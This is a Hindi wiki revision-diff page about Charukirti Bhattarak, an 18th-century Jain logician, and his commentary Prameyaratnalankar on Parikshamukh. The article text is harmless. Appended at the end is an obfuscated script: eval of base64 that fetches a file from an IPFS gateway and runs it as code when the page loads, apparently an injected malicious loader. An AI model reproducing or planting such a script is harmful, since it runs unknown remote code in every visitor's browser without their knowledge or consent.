Difference between revisions of "चारुकीर्ति भट्टारक"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (1 अवतरण)
 
(6 intermediate revisions by 5 users not shown)
Line 1: Line 1:
{{Menu}}
+
'''आचार्य चारुकीर्ति भट्टारक'''<br />
==आचार्य चारुकीर्ति भट्टारक / Acharya Charukirti bhattarak==
+
 
*ये वि0 सं0 की 18वीं शती के तार्किक हैं।  
+
*ये वि. सं. की 18वीं शती के तार्किक हैं।  
 
*इन्होंने [[माणिक्यनन्दि]] के परीक्षामुख पर बहुत से ही विशद एवं प्रौढ़ व्याख्या 'प्रमेयरत्नालंकार' लिखी है, जो मैसूर यूनिवर्सिटी से प्रकाशित है।  
 
*इन्होंने [[माणिक्यनन्दि]] के परीक्षामुख पर बहुत से ही विशद एवं प्रौढ़ व्याख्या 'प्रमेयरत्नालंकार' लिखी है, जो मैसूर यूनिवर्सिटी से प्रकाशित है।  
 
*रचना तर्कपूर्ण है।  
 
*रचना तर्कपूर्ण है।  
Line 8: Line 8:
 
*इन्हीं अथवा दूसरे चारुकीर्ति की 'अर्थप्रकाशिका' भी है, जो प्रमेयरत्नमाला की संक्षिप्त व्याख्या है।  
 
*इन्हीं अथवा दूसरे चारुकीर्ति की 'अर्थप्रकाशिका' भी है, जो प्रमेयरत्नमाला की संक्षिप्त व्याख्या है।  
 
*ये 'पण्डिताचार्य' की उपाधि से विभूषित थे।
 
*ये 'पण्डिताचार्य' की उपाधि से विभूषित थे।
[[Category:कोश]]
+
{{menu}}
 +
==संबंधित लेख==
 +
{{जैन धर्म2}}
 +
{{जैन धर्म}}
 +
[[Category:दर्शन कोश]]
 
[[Category:जैन_दर्शन]]
 
[[Category:जैन_दर्शन]]
 
__INDEX__
 
__INDEX__

Latest revision as of 11:26, 14 June 2011

achary charukirti bhattarak

  • ye vi. san. ki 18vian shati ke tarkik haian.
  • inhoanne manikyanandi ke parikshamukh par bahut se hi vishad evan praudh vyakhya 'prameyaratnalankar' likhi hai, jo maisoor yoonivarsiti se prakashit hai.
  • rachana tarkapoorn hai.
  • isamean navyanyay ka bhi anek sthaloan par samavesh hai.
  • charukirti ki vidvatta aur pandity donoan isamean drishtigochar hote haian.
  • inhian athava doosare charukirti ki 'arthaprakashika' bhi hai, jo prameyaratnamala ki sankshipt vyakhya hai.
  • ye 'panditachary' ki upadhi se vibhooshit the.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>